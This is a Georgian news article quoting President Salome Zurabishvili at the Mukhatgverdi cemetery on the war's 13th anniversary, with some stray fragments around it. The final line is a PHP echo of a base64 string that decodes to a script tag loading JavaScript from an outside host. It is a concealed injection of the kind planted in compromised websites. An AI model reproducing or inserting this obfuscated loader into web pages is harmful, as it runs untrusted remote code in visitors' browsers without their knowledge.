celsiusi
ავერსი შნაიდერი
ჩვენ ყველანი ვნახავთ საქართველოს გამთლიანებას. მინდა ეს დღე იყოს სწორედ იმ გმირების დღე, რომელთა თავდადება იმედისთვის თავდადება იყო, - ამის შესახებ საქართველოს პრეზიდენტმა, სალომე ზურაბიშვილმა აგვისტოს ომიდან 13 წლისთავთან დაკავშირებით განაცხადა.
 
მან მთავრობის წევრებთან ერთად მუხათგვერდის ძმათა სასაფლაოზე აგვისტოს ომში დაღუპულ გმირებს პატივი მიაგო და აღნიშნა, რომ 8 აგვისტო არა გლოვის, არამედ იმედის დღე უნდა იყოს.
 
„დღევანდელ დღეს აქ ვართ მოსული, რომ პატივი ვცეთ იმ დაღუპულ გმირებს, ვინც თავი დასდეს საქართველოს ტერიტორიული მთლიანობისთვის. ისინი შედიან იმ ძალიან დიდი ქართველების რიგებში, რომლებიც საქართელოს დამოუკიდებლობისა და ტერიტორიული მთლიანობისთვის დაიღუპნენ. არ ვფიქრობ, რომ დღეს გლოვის დღე უნდა იყოს, როგორც არ ვთვლი, რომ 9 აპრილი გლოვის დღე უნდა იყოს, რადგან ეს არის ჩვენი მომავლის, იმედის დღე, რომელიც არასდროს არ უნდა დავკარგოთ. მახსენდება წლების მანძილზე, ძალიან ბევრს როგორ გვჯეროდა საქართველოს მომავალი დამოუკიდებლობის, როცა საბჭოთა კავშირი არსებობდა და ყველა ამბობდა, რომ ეს შეუძლებელი იყო. დღესაც იგივეა, შეიძლება ვერ ვხედავდეთ ზუსტად კონკრეტულ გზას, რომელიც ქვეყნის ტერიტორიული მთლიანობის აღდგენამდე მიგვიყვანს, მაგრამ ჩვენ რომ ამას დღეს ვერ ვხედავთ დაზუსტებით, არ ნიშნავს იმას, რომ ეს გზა ჩვენს წინ არ არის, ამ გზის უნდა გვჯეროდეს და ეს დღე სწორედ ამ გზის დაჯერების დღეა. ჩვენი მხარდამჭერები არიან ძალიან ბევრი, საერტაშორისო თანმეგობრობამ გამოთქვა თავისი მხარდაჭერა, რაც ასეთი მტკიცე არ ყოფილა. რამდენიმე დღეში იქნება დიდგორის გახსენება, ესეც არის საქართველოს ისტორია, როლემლიც გამარჯებისა და დამარცხებებისგან შედგება, მაგრამ წინ მიდის. ეს ქვეყანა ამით არ ასრულდება. ჩვენ ყველანი ვნახავთ საქართველოს გამთლიანებას. მინდა ეს დღე იყოს სწორედ იმ გმირების დღე, რომელთა თავდადება იმედისთვის თავდადება იყო“,-განაცხადა ზურაბიშვილმა.
957
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");